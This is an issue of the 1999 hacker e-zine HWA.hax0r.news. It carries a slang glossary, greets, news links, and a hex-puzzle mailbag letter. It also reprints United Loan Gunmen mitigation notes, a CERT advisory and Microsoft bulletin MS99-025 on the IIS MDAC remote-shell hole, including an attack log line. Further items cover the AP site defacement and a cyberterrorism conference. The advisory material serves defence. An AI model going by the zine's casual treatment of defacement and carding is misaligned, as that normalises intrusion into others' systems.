http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi
Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #Hackwhores
and #403-sec
Celeb greets to Bad Kitty! meeyeaaooow! (you can hack my root anytime)
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ contributed by AW, From HNN http://www.hackernews.com/
HNN has received an unconfirmed rumor that the host
of Parse Hack/Phreak, Shamrock was fired for unknown
reasons. Shamrock along with UglyPig will evidently no
longer be hosting any Pseudo.com shows. This action
comes not two weeks after the MTV special in which
Shamrock manufactured a hoax for the 'documentary'.
There was no episode of Parse last week and HNN has
yet to receive official word from Psuedo.com. It will be
interesting to see if this weeks scheduled episode will
air. (That show needed a change of format anyway.)
http://Parsetv.com
http://www.biztechtv.com/parse
++ Contributed by duro
To celebrate the upcoming mass-destruction and world-wide chaos in 2000,
w00w00 Security Development (WSD) will be releasing many advisories
depending on vendor's timely responses.
The severity of each vulnerability will outweigh the previously posted
one, so keep your eyes out!
If all goes according to plan, w00giving '99 will close with its largest
vulnerability on Jan. 1, 2000, aka w00mageddon.
++ Contributed by Astral
Nov 7th, 1999 #403-sec opens up on EFnet, the channel for http://www.403-security.org
related stuff and news... drop by and say hi.
++ Echelon 'Confirmation:' Not (Politics 11:45 a.m.)
http://www.wired.com/news/politics/0,1283,32302,00.html?tw=wn19991103
An Australian official's remarks to the BBC may bolster calls for
investigation into international surveillance activities. But they
don't confirm the alleged Project Echelon, experts say. By Chris Oakes.
++ Bull Carries Apple to Record (Reuters 12:20 p.m.)
http://www.wired.com/news/reuters/0,1349,32306,00.html?tw=wn19991103
They're singing "Kumbaya" down in Cupertino on Wednesday because
shares of the computer maker surge to an all-time high.
++ Rats Dive into Cell Phone Debate (Technology 3:00 a.m.)
http://www.wired.com/news/technology/0,1282,32280,00.html?tw=wn19991103
An experiment with rats swimming in milk indicates cell phones may
damage long-term memory and the ability to navigate. What does this
strange study mean for humans? By Kristen Philipkoski.
++ Why the DVD Hack Was a Cinch (Technology 2.Nov.99)
http://www.wired.com/news/technology/0,1282,32263,00.html?tw=wn19991103
DVD movies were supposed to be pirate-proof -- that was its reason for
being. So how could two hackers break the code in a matter of hours?
Human error on the encryption end. By Andy Patrizio.
++ The DVD Hack: What Next? (Technology 3:00 a.m.)
http://www.wired.com/news/technology/0,1282,32265,00.html?tw=wn19991104
The supposed hacker-proof DVD security system was easily broken by
Linux users who couldn't watch movies on their systems. Andy Patrizio,
who broke the story, offers suggestions about what the movie industry
should do next.
++ Haiti Shuts Down Its Biggest ISP (Politics 3:00 a.m.)
http://www.wired.com/news/politics/0,1283,32316,00.html?tw=wn19991104
Thousands of Haitians lose Internet access when the government pulls
the plug on the country's largest ISPs. Civil libertarians say the move
supresses free speech and rally protesters.
++ China's Cable TV Fights for Net (Reuters 3:00 a.m.)
http://www.wired.com/news/reuters/0,1349,32315,00.html?tw=wn19991104
China's government maneuvers to stem an increasingly bitter battle
between cable operators and telephone companies over their future on
the Net.
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
From: red_army <red_army@deep-space.dhs.org>
To: <cruciphux@dok.org>
Sent: Tuesday, November 02, 1999 9:00 PM
hey, how's it going. i think i decoded your codes. any
prizes for doing that? ;) a mention would be fine...
keep up the good work (and make the codes a little harder!)
(code from hwa.haxor.news issue 40)
1st code:
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
to hex:
99 41 32 49 57 57 57 32 99 114 117 99 112 104 117 120 32 104 119 97
to ascii:
c) 1999 crucphux hwa
which seems kinda incomplete, but that's how it decodes....
2nd k0de:
61:20:6B:69:64:20:63:6F:75:
6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!
decimal:
97:32:107:105:100:32:99:111:117:
108:100:32:98:114:101:97:107:32:116:104:105:115:
32:34:105:110:99:114:121:112:116:105:111:110:34:!
ascii:
a kid could break this "incryption" <sic>!
no sweat.
3rd code:
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-
[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
decimal:
(first line appears to be decimal already)
69:110:100 - 40:97:49:57:57:56:32:104:119:97:32:115:116:101:118:101
plain ascii:
first line has a lot of unprintables that i dunno right now...
perhaps it is in sneaky hex?[1] and what is the minus sign for? intriguing...
Enn-(a1998 hwa steve
first line in hex:
40 97 41 32 49 57 57 57 32 97 114 117 97 105 112 104 117 120 32 104 119 97
first line in ascii:
(a) 1999 aruaiphux hwa
total ascii:
(a) 1999 aruaiphux hwa
Enn - (a1998 hwa steve
well, it seems clear that sometimes a = c, but sometimes not
changing selected a's yields:
(c) 1999 cruciphux hwa
Enn - (a1998 hwa steve
i feel the top line is correct: all these exist as plaintext strings within the newsletter
(hell, cruciphux writes the damn thing, doesn't he/she/non-gender-specific-pronoun?)
but the bottom....
try subtracting second from first..
69:110:100
- 40:97 :49 :57:57:56:32:104:119:97:32:115:116:101:118:101
------------------
29:3 :51, the first two are unprintable (meaning i don't know them)
try adding the two modulus 128 (ascii, right? sure...)
69:110:100
+ 40:97 :49
-------------------
(mod 128) 109:79:21 => mO<unprintable>
try subtracting first from end of second: but that won't work, that will give us unprintables
ok, so we got three characters. changing three characters at the beginning is not immediately
obvious what that would give us. changing three characters at the end is somewhat more likely
because a) st!!! could be a valid word, and b) steve doesn't make much sense, unless steve is
cruciphux, which i don't know. ok, let's think this through...
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
is it coincidence that the three 'mystery' letters line up with three other letters? what can we
do with those? remember, those seem to be part of a valid string, but the other three could be
changed to give something else. (whatever that thought meant...)
63:29:20
45:6E:64
in decimal 108:102:84 (if E = 3, 3 = E in h@X0r5p3@k, right?) => lfU, which is at least a
printable string, but not immediately obvious (unless cruciphux attends lower florida university
or something like that, fuck school pride)
converted from hex to decimal:
97:41 :32
69:110:100
added: 166:151:132
now, the highest letter ascii code is 122 (126 really, forget the tilde for now) and the lowest
is 65 (33 for punctuation), so we have a spread of 122-65 = 57 characters. given that our added
string has a spread of 166-132 = 34 characters, we have 23 different permutations of possible
characters (again, just using letters...) hmmmm.....
ok, this is a little wild, but here goes:
taking 100 away from each of those leaves 'B3 '
using that, the bottom line reads as:
B3 -(a1998 hwa steve
let's look at what we have to work with:
from the 1st part:
c) 1999 crucphux hwa
from the second part:
(a) 1999 aruaiphux hwa
Enn-(a1998 hwa steve
or, verbatim:
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
they do form lines, but i don't really feel like doing any matrix theory now (especially in
ascii).
c) 1999 crucphux hwa
(a) 1999 aruaiphux hwa
Enn-(a1998 hwa steve
more speculation: if the e were lower case, it would have the same spread as 1 and 9; we would
have to subtract (166-49=) 117 from at least that first term. doing that to all three yields
1"<unprintable> - that's not going to work.
ok, i am thinking too hard. maybe
ok, i got it. yes, i was thinking too hard, made a simple mistake at the stop. the last string
should read (ok, i made a couple of mistakes):
End-(c)1998 hwa steve
which makes a lot more sense. and so the moral of the story is:
check your fuckin work so you don't waste time later on!
nice puzzle though, keep it up!
(ps - i dunno if you were being facetious, but it's 'encryption', not 'incryption'. you know that
already, i bet)
[1] sneaky hex in that it not obviously hex, i.e. no letters... forget it
keep up the good work
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* I included some graphics in last week's issue and forgot to give
* credit where it was due, the png was done by ScrewUp from the U.K
* and the digital blasphemy rip was done by yours truly, with art
* blatantly borrowed from http://www.digital-blasphemy.com/
*
* Enjoy the issue, sorry again for it being late, have been ill, #42
* will be out ASAP covering Nov 7th - 14th. Included in the .zip of
* this issue is a .bmp by Zym0t1c check it out, nice artwork...
* Cruciphux@dok.org
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
03.0 Fix Available For Very Powerful IIS Exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Ender Wiggin
The recent spate of defacements of government and
military sites may be the result of a hole released to
BugTraq six months ago. This hole can be exploited with
a simple perl script. A fix for this problem has come from
a very unlikely source, the United Loan Gunmen.
OSALL
http://www.aviary-mag.com/News/Powerful_Exploit/ULG_Fix/ulg_fix.html
Late Update: 0931
CERT has also released an advisory on the issue and
Microsoft does have an old fix. Considering the number
of high profile sites that have been defaced because of
this we suggest you patch your system now.
CERT
http://www.cert.org/current/current_activity.html#0
Microsoft Security Bulletin
http://www.microsoft.com/security/bulletins/ms99-025.asp
OSALL;
Temporary Fix for Remote IIS NT AUTHORITY / SYSTEM Shell
Spawning Exploits
11/1/99
United Loan Gunmen
Recently, a perl script from Rain Forest Puppy was released, has become a
favorite amongst script kiddies. The severity of this script allows remote NT
AUTHORITY/SYSTEM level access, and is a major threat, even to highly
secured NT networks.
We have come up with 2 ways of thwarting these types of attacks. Since RFP's
perl script relies on the use of either cmd.exe or command.com, we feel that a
temporary fix of renaming cmd.exe shell or command.com shell to something
else. Doing this will mostl likely fool 99% of the script kiddies.
A better temporary idea would be to set permissions of cmd.exe and
command.com for NT AUTHORITY/SYSTEM to that of 'No Access' versus
'Full Control'. The most noted problem with this is that of using the Schedule
service, which, by default, runs as NT AUTHORITY/SYSTEM. In this case, in
order to still use the service, Simply open up Services in the Control Panel.
Select Schedule, then click the 'Startup...' button. By default, services are run as
the System Account. Select the 'This Account:' radio button, and select a
different user to run at services as. If you dont already have a user, create a new
account.
NOTE: With NT, we found it is a wise idea to set user access for shells (with
NT, cmd and command) be different for services. This means that if netinfo.exe is
run as NT AUTHORITY/SYSTEM, don't let NT AUTHORITY/SYSTEM have
shell access.
Should the ability to spawn a shell be possible, having permissions set as the
above will stop it from happening, even if the hole is still there.
We have only provided a temporary fix, as we have not had much time to spend
dealing with RFP's perl script. Look to Microsoft or a third party to provide a
real fix.
-United Loan Gunmen.
CERT;
Attacks against IIS web servers involving MDAC
We are receiving reports of IIS web servers being compromised via
vulnerabilities in IIS web servers with MS Data Access Components (MDAC)
installed. This vulnerability has been widely discussed as early as April
22, 1998. Here are some pointers to information about this vulnerability:
http://support.microsoft.com/support/kb/articles/q184/3/75.asp
http://www.microsoft.com/security/bulletins/ms98-004.asp
http://www.microsoft.com/security/bulletins/ms99-025.asp
In incidents reported to us so far, attacks can be identified by looking
through the IIS logfiles for POST access to the file "/msadc/msadcs.dll".
For example:
1999-10-24 20:38:12 - WWW POST /msadc/msadcs.dll 200 1409 664 782 ACTIVEDATA - -
If you use Microsoft Remote Data Services (RDS) these POST operations may
be legitimate.
We encourage all sites using IIS to carefully follow the steps listed in
Microsoft Advisory MS99-025, referenced above, to secure or disable RDS.
Root Compromised UNIX Systems
rpc.cmsd, tooltalk, statd/automountd
We continue to receive frequent reports of intruders exploiting three
different RPC service vulnerabilities to compromise UNIX systems. In
many cases, the attacks are widespread and appear to be at least
partially automated.
For more information about this activity and the vulnerabilities being
exploited, please refer to the following CERT/CC documents:
IN-99-04, Similar attacks using various RPC services
CA-99-08, Buffer overflow in rpc.cmsd
CA-99-05, Vulnerability in statd exposes vulnerability in automountd
CA-98.11, Vulnerability in ToolTalk RPC service
am-utils (amd)
We also continue to receive reports of intruder activity involving
the am-utils package.
For more information about this activity and the vulnerabilities being
exploited, please refer to the following CERT/CC documents:
IN-99-05, Systems Compromised Through a Vulnerability in am-utils
CA-99-12, Buffer overflow in amd
Distributed Intruder Tools
Distributed Denial of Service Tools
We are receiving an increasing number of reports about intruders
compromising machines in order to install distributed systems used for
launching packet flooding denial of service attacks. The systems contain
a small number of servers and a large number of clients.
These reports indicate that machines participating in such distributed
systems are likely to have been root compromised.
Widespread Scans and Probes
We continue to receive daily reports of widespread scans and probes.
Probe targets continue to include well-known services and a variety of
registered and unregistered service ports. In some cases, scanning is
automated and includes automated exploitation of vulnerabilities.
The most frequent reports involve probes for services that have well-known
vulnerabilities. Hosts continue to be compromised as a result of the
vulnerabilities associated with these services. On some operating systems,
these services are installed and enabled by default.
Service Name Port/Protocol Related Information
domain 53/tcp CA-98.05, Multiple Vulnerabilities
in BIND
ftp 21/tcp CA-99-13, Multiple Vulnerabilities
in WU-FTPD
icmp echo 8/icmp CA-98.01, Smurf IP Denial-of-Service
Attacks
sunrpc 111/tcp CA-99-12, Buffer overflow in amd
CA-99-08, Buffer overflow in rpc.cmsd
CA-99-05, Vulnerability in statd
exposes vulnerability in
automountd
CA-98.11, Vulnerability in ToolTalk
RPC service
CA-98.12, Remotely Exploitable
Buffer Overflow Vulnerability
in mountd
imap 143/tcp CA-98.09, Buffer Overflow in Some
Implementations of IMAP
Servers
For an overview of incident and vulnerability activity during the last
quarter, see the most recent CERT Summary.
Copyright 1999 Carnegie Mellon University.
See the conditions for use, disclaimers, and copyright information.
CERT® and CERT Coordination Center® are registered in the U.S. Patent and
Trademark office.
Microsoft;
Originally Released as MS98-004: July 17, 1998
Re-Released as MS99-025: July 19, 1999
Revised: July 23, 1999
Microsoft has identified a vulnerability in Microsoft Data Access Components
(MDAC) that could allow a web site visitor to take unauthorized actions on a
web site hosted using Internet Information Server. The vulnerability can be
eliminated by reconfiguring or removing the affected components of MDAC.
This vulnerability originally was reported in ms98-004.asp Microsoft Security
Bulletin MS98-004 issued July 17, 1998. It was re-released on July 19, 1999,
to remind customers of the need to address the vulnerability. It was updated
on July 23, 1999, to discuss the need to remove sample files that are affected
by the vulnerability, and to clarify that MDAC 2.0 is affected even if deployed
as a clean installation.
Frequently asked questions regarding this vulnerability can be found at
ms99-025faq.asp http://www.microsoft.com/security/bulletins/MS99-025faq.asp.
The FAQ contains instructions for eliminating the vulnerability.
The RDS DataFactory object, a component of Microsoft Data Access Components
(MDAC), exposes unsafe methods. When installed on a system running Internet
Information Server 3.0 or 4.0, the DataFactory object may permit an otherwise
unauthorized web user to perform privileged actions, including:
- Allowing unauthorized users to execute shell commands on the IIS system as
a privileged user.
- On a multi-homed Internet-connected IIS system, using MDAC to tunnel SQL
and other ODBC data requests through the public connection to a private
back-end network.
- Allowing unauthorized accessing to secured, non-published files on the
IIS system.
Affected Software Versions
The vulnerability affects the Microsoft Data Access Components, when installed
on a web server running Internet Information Server 3.0 or 4.0. Specifically:
- MDAC 1.5 and 2.0 are affected
- MDAC 2.1 is affected if installed as an upgrade from a previous version of
MDAC, rather than a clean installation
- Any version of MDAC is affected if Sample Pages for RDS are installed.
NOTE: Sample Pages for RDS are provided as part of the Windows 4.0 Option Pack
and the MDAC 2.0 Software Development Kit. They are not installed by default
in the Option Pack, but are installed by default in the MDAC 2.0 SDK.
NOTE: MDAC 1.5 and IIS are installed by default installations of the Windows
NT 4.0 Option Pack.
NOTE: IIS can be installed as part of other Microsoft products, such as
Microsoft BackOffice and Microsoft Site Server. MDAC can be installed
as part of other Microsoft products, such as Visual C and Microsoft Office.
Patch Availability
This vulnerability requires a configuration change to eliminate it, rather than
a patch. Details of the specific changes needed are available at
/security/bulletins/ms99-025faq.asp
http://www.microsoft.com/security/bulletins/MS99-025faq.asp
</P>
More Information
Please see the following references for more information related to this issue.
- Microsoft Security Bulletin MS99-025: Frequently Asked Questions,
MS99-025faq.asp http://www.microsoft.com/security/bulletins/MS99-025faq.asp
- Microsoft Knowledge Base (KB) article Q184375, Security Implications of RDS
1.5, IIS, and ODBC
http://support.microsoft.com/support/kb/articles/q184/3/75.asp
http://support.microsoft.com/support/kb/articles/q184/3/75.asp
- Microsoft Universal Data Access Download Page,
http://www.microsoft.com/data/download.htm
http://www.microsoft.com/data/download.htm
- Installing MDAC Q&A, http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm
http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm
- Microsoft Security Advisor web site,
http://www.microsoft.com/security/default.asp
http://www.microsoft.com/security/default.asp
- IIS Security Checklist,
http://www.microsoft.com/security/products/iis/CheckList.asp
http://www.microsoft.com/security/products/iis/CheckList.asp
Obtaining Support on this Issue
Microsoft Data Access Components (MDAC) is a fully supported set of technologies.
If you require technical assistance with this issue, please contact Microsoft
Technical Support. For information on contacting Microsoft Technical Support,
please see http://support.microsoft.com/support/contact/default.asp
http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
Microsoft acknowledges Greg Gonzalez of http://www.infotechent.net
ITE for bringing additional information regarding this vulnerability to our
attention, and .Rain.Forest.Puppy for identifying the involvement of Sample
Pages for RDS. Microsoft also acknowledges Russ Cooper
(http://www.ntbugtraq.com NTBugTraq) for his assistance around this issue.
Revisions
July 19, 1999: Bulletin Created as re-release of MS98-004.
July 23, 1999: Bulletin updated to discuss involvement of Sample Pages for RDS,
and to clarify status of MDAC 2.0.</LI>
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED AS IS
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS
OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE
LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,
CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT
CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL
OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.
@HWA
04.0 ULG Defaces Associated Press Web Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by punkis
While the United Loan Gunmen may be supplying fixes
for some security problems (see above story) they are
still busy defacing more sites. This time it was the
Associated Press who was left with a page wishing folks
a Happy Halloween and a poem by Edgar Allen Poe.
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500051909-500085255-500280864-0,00.html
Wired
http://www.wired.com/news/culture/0,1284,32237,00.html
Nando;
Hackers break into Associated Press Web site
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
NEW YORK (November 1, 1999 9:27 p.m. EST http://www.nandotimes.com) -
Hackers gained access to the The Associated Press' corporate Web site and
displayed a Halloween greeting with a poem by Edgar Allan Poe.
The page placed on the AP site Sunday carried the name of the
"United Loan Gunmen." That name has appeared on break-ins at six other sites
since August, including those of the Drudge Report, C-Span and ABC. The group
also claimed responsibility for hacking a site for Nasdaq and the American
Stock Exchange.
AP news operations were unaffected.
Wired;
AP Scared Siteless
Wired News Report
1:00 p.m. 31.Oct.1999 PST
The "United Loan Gunmen" apparently struck again Sunday, this time by
cracking the venerable Associated Press.
Content on the wire service's corporate Web site was replaced with a Halloween
greeting along with a poem by Edgar Allen Poe, according to the AP. The AP said
its news wires were unaffected by the intrusion.
The crackers have previously claimed credit for attacks on the Nasdaq and the
American Stock Exchange, as well as the Drudge Report, C-Span, and ABC.
Site defacement;
<ULG graphic>
Double, double, toil and trouble;
Fire burn and caldron bubble.
~Edgar Allen Poe~
In the greenest of our valleys
By good angels tenanted,
Once a fair and stately palace-
Radiant palace- reared its head.
In the monarch Thought's dominion-
It stood there!
Never seraph spread a pinion
Over fabric half so fair!
Banners yellow, glorious, golden,
On its roof did float and flow,
(This- all this- was in the olden
Time long ago,)
And every gentle air that dallied,
In that sweet day,
Along the ramparts plumed and pallid,
A winged odor went away.
Wanderers in that happy valley,
Through two luminous windows, saw
Spirits moving musically,
To a lute's well-tuned law,
Round about a throne where, sitting
(Porphyrogene!)
In state his glory well-befitting,
The ruler of the realm was seen.
And all with pearl and ruby glowing
Was the fair palace door,
Through which came flowing, flowing, flowing,
And sparkling evermore,
A troop of Echoes, whose sweet duty
Was but to sing,
In voices of surpassing beauty,
The wit and wisdom of their king.
But evil things, in robes of sorrow,
Assailed the monarch's high estate.
(Ah, let us mourn!- for never morrow
Shall dawn upon him desolate!)
And round about his home the glory
That blushed and bloomed,
Is but a dim-remembered story
Of the old time entombed.
And travellers, now, within that valley,
Through the red-litten windows see
Vast forms, that move fantastically
To a discordant melody,
While, like a ghastly rapid river,
Through the pale door
A hideous throng rush out forever
And laugh- but smile no more.
@HWA
05.0 Jane's To Host Cyber Terrorism Conference
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
Jane's Intelligence Review will be hosting a conference
on Cyber Terrorism in Washington DC on November 16
and 17, 1999. The title of the conference is
Cyberterrorism: The Risks and Realities.
Cyberterrorism: The Risks and Realities
http://www.janes.com/defence/conference/cyberterrorism/cyber_home.html
Janes conferences
Terrorist organizations, both domestic and international,
are looking toward technology to further their goals of
disrupting your life or even harming you and the people you
are trying to protect. Terrorists for the first time have the
ability to affect your life remotely. By using computers
and the internet, they can strike from the other side of the
world, with relative anonymity and free from danger.
CyberTerrorism requires simple, inexpensive hardware, free
software and information available over the Internet.
Awareness to a new state of terrorism is crucial whether
you are trying to protect your own computer, your
company's systems or the infrastructure of your city or
country. It is less the types of hacking incidents and mass
distribution of viruses that receive media attention that is
important. The real threat is an insidious form of hard-core
hacking where the physical and virtual worlds collide.
Whether you are in the military, government or private
sector, your vulnerability to terrorist attack is only
increasing as the world becomes more dependent on
computer systemsespecially in critical infrastructure and
life affecting industries that are being linked with each other
across the globe. Now you are not just in alliance with
other people and nations, but also their communication
equipment, computers and other technologies. Systems
that control your finances, power, water, and
communications as well as those in food and
pharmaceutical plants, are vulnerable.
Jane's CyberTerrorism: The Risks and Realities goes
beyond the threats and issues and focuses on practical
solutions to real threats to your security:
- You will be guided through ways to develop and
implement a counter-CyberTerrorism program.
- You will leave the conference with a clear sense of
direction and a list of feasible steps assess your
risk and build a program of prevention, detection and
response.
- You will get plenty of time for questions as well as
interaction with speaker and colleagues.
- You can put the information you have learned to
work during a mock CyberTerrorism attack
wargame.
@HWA
